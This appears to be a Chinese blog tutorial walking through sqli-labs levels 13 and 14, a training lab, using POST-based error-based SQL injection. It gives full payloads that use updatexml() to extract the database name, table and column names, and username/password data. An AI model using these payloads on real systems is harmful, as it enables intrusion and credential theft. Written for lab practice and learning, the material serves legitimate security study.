(手工)【sqli-labs13-14】POST注入:报错回显(基本步骤)

已于 2022-07-08 16:32:53 修改
阅读量751 收藏 7
点赞数 1
分类专栏: # 【全】sqlil-abs靶场 文章标签: web安全 数据库
于 2022-07-07 20:26:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/125660497
版权

目录

推荐:

一、POST(报错)SQL注入基本步骤:

 2.1、第一步:判断是否存在SQL漏洞

2.2、第二步:判断字段数

2.3、第三步:查询当前数据库

2.4、第四步:查表名

2.5、第五步:查字段

2.6、第六步:查数据

二、Less13(POST-Double injection - Single Quotes String-with twist)

2.1、简介:(错误-单引号)

 第一步:注入点测试

第二步:判断字段数

第三步:爆数据库

 第四步:爆表名

 第五步:爆字段

 第六步:爆数据

三、Less14(POST-Double injection - Single Quotes String-with twist)

3.1、简介:(错误-单引号)

推荐:

【SQL注入-可回显】报错注入:简介、相关函数、利用方法https://blog.csdn.net/qq_53079406/article/details/125017089?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165718272016782390523827%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165718272016782390523827&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125017089-null-null.185%5Ev2%5Econtrol&utm_term=%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5&spm=1018.2226.3001.4450

一、POST(报错)SQL注入基本步骤:

 2.1、第一步:判断是否存在SQL漏洞

在输入框中填入一些闭合的符号,看页面是否异常

如: ’        "          ')          ")

当页面发生错误,则证明闭合有效

有时单双引号闭合后,还要考虑括号个数

2.2、第二步:判断字段数

例如:

”) order by 3#

当回显正确的时候,或无报错,就判断出字段数

2.3、第三步:查询当前数据库

例如:

“) union select 1,updatexml(1,concat(0x7e,(select database()),0x7e),1)#

2.4、第四步:查表名

例如:

”) union select 1,updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,31),0x7e),1)#

2.5、第五步:查字段

例如:

“) and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),1,31),0x7e),1)#

2.6、第六步:查数据

例如:

”) and updatexml(1,concat(0x7e,substr((select group_concat(username,password) from users),1,31),0x7e),1)#

二、Less13(POST-Double injection - Single Quotes String-with twist)

2.1、简介:(错误-单引号)

请求方法:POST

方法:报错注入

 第一步:注入点测试

加上单引号后,发现会返回报错信息,且可以知道是单引号闭合的

可以考虑使用报错注入

发现还有括号

’)#后没有报错了

 使用联合查询发现没有返回结果

所以这里考虑使用报错注入

第二步:判断字段数

admin') order by 2#

为2的时候没有报错

字段数为2

第三步:爆数据库

admin') union select 1,updatexml(1,concat(0x7e,(select database()),0x7e),1)#

(这个地方字段数不对也能爆出来数据)

 第四步:爆表名

admin') union select 1,updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,31),0x7e),1)#

(这里字段数不对,就不能爆出数据)

 第五步:爆字段

admin') and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),1,31),0x7e),1)#

 第六步:爆数据

admin') and updatexml(1,concat(0x7e,substr((select group_concat(username,password) from users),1,31),0x7e),1)#

三、Less14(POST-Double injection - Single Quotes String-with twist)

3.1、简介:(错误-单引号)

请求方法:POST

方法:报错注入

方法同Less13

黑色地带(崛起)
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
05_SQL注入_功能语句&报错注入&盲注
qq_42171569的博客
05-07 1035
05_SQL注入_功能语句&报错回显&盲注 1. SQL 语句和网站功能 1.1 Web开发中常见语句 【本章代码来源于pikachu和sqli-lab中的靶场】 开发中,根据不同的需求,开发者会采用不同SQL语句与数据库进行交互,渗透测试人员在采用黑盒测试的情况下,根据不同的功能猜测对应语句进行注入是一项必备能力。 1. select查询语句 select 往往用于网站需要显示查询的操作,考虑如下代码,'name’可以直接拼接到sql语句中,且能够进行回显,那么思路就是可回显注入的一般思路
SQL注入-可回显报错注入:简介、相关函数、利用方法
05-29 1667
SQL注入-可回显
sqli-labs通关详解(1-20关)
最新发布
2302_81105681的博客
04-11 1465
1.首先判断闭合方式在我之前发布的文章中有详细的sql注入判断闭合的方法和原理,参考《sql注入实验原理》在1-6关,我们可以通过在参数后面加\的方法判断闭合\后面的符号就是闭合符号,由此可见第一关的闭合方式为'闭合2.判断字段数当我们输入?id=1' order by 4--+时页面显示没有第4字段,由此判断字段数为3.3.判断回显位因为有三个字段,所以我们使用命令判断出第2,3字段的内容回显在页面中4.爆数据库名我们可以将2或者3更改为database()来使页面回显数据库名。
sqli-labs第一关:有回显位的提示信息注入
m0_51395584的博客
02-14 601
sqli-labs第一关:有回显位的提示信息注入 (一到四关的注入方式类似,只是SQL语句的闭合方式不同) 第一步:直接输入网址: 127.0.0.1/sqli-labs-master/Less-1/ 第二步:设置id=1,确定是否与数据库有交互 127.0.0.1/sqli-labs-master/Less-1/?id=1 第三步:利用 order by 判断当前使用的表有多少个字段,当后面的数字超出当前表的字段后,页面会报错,只有当小于或等于当前表的字段数时,页面才会正常显示 http:
渗透测试之SQL注入POST型的四种注入手法)、SQL注入绕过手段
Hi~ 土拨鼠
12-11 6599
文章目录使用BurpSuite进行post请求的抓包使用联合查询进行注入:使用报错注入进行注入:布尔盲注:时延查询:SQL注入绕过手段大小写字母绕过双写绕过编码绕过内联注释绕过 POST和GET的区别就是注入点位置发生了变化,在浏览器中已经无法直接进行查看与修改。当然可以借助对应的插件可以完成修改任务。 使用BurpSuite进行post请求的抓包 以Sqli-Lab Less11为例。 查看抓的包 将抓到的包发送到repeater模块,就可以进行重复测试了 初步判断sql语句大概为:select un
post注入报错注入学习笔记
XiaoXiao_RenHe的专栏
04-24 2804
post注入报错注入学习笔记
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
墨者学院——SQL注入漏洞测试(POST)
2303_76679642的博客
04-23 577
6.找字段内容“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 -C (字段1,字段2,....) --dump --dbms mysql --batch”5.找数据库表里面的字段“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 --columns --dbms mysql --batch”测试环境为Kali Linux。
post 注入 head 注入 报错注入
weixin_74737710的博客
08-28 61
',(select column_name from information_schema.columns where table_schema=database() and table_name='表名' limit 0,1)),2) 由于正常查询 出现的是表 加上 limit 限制数据只有一条。
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4142
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
SQL-labs的第34关——报错注入 宽字节注入POST
qq_73393033的博客
08-09 285
我们发现该网站会返回报错信息,直接使用报错注入吧。发现该关还是会向危险字符自动添加斜杠。截取数据包,进行注入,输入语句。出现报错,说明单引号逃逸成功。我们发现无法中和反斜杠。
sql注入——报错注入
m0_73756016的博客
10-18 1245
报错注入是什么 什么是报错注入? 这是一种页面响应形式。响应过程如下: 用户在前台页面输入检索内容 后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。 报错注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查 分类 1. 通过floor()报错注入 2.通过extractValue()报错注入 3.通过updateXml()报错注入 4.通过NAME_CONST()
sqli-labs-基于报错注入
zlloveyouforever的博客
04-30 2742
这里使用sqli-labs第六关来学习报错注入,当然第五关也是可以使用的。会简单介绍updatexml(),extractvalue(),floor(),exp(),geometrycollection(),multipoint()六个函数的使用。
错误回显
qq_37388518的博客
01-16 301
前提:将前面的用户注册案例的时间转化时,抛出运行时异常 在struts.xml中配置回显页面,让其发生错误后还回到这个注册页面,并且给出错误信息 在register.jsp中添加struts的标签 那么当出现错误的时候就会把出现错误的错误信息抛出到这个标签内部 这里面注意,错误必须抛出,要不然不会回显 ...
手工)【sqli-labs11-12】POST注入基本步骤、示例
07-07 1276
SQL-POST注入
sqli-labs注入靶场搭建
09-25
sqli-labs是一个用来学习sql注入的环境。搭建sqli-labs注入靶场...以上是基本sqli-labs注入靶场搭建的步骤。你可以根据自己的环境进行相应的配置和调整。如果遇到问题,可以参考sqli-labs的文档或寻求相关的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值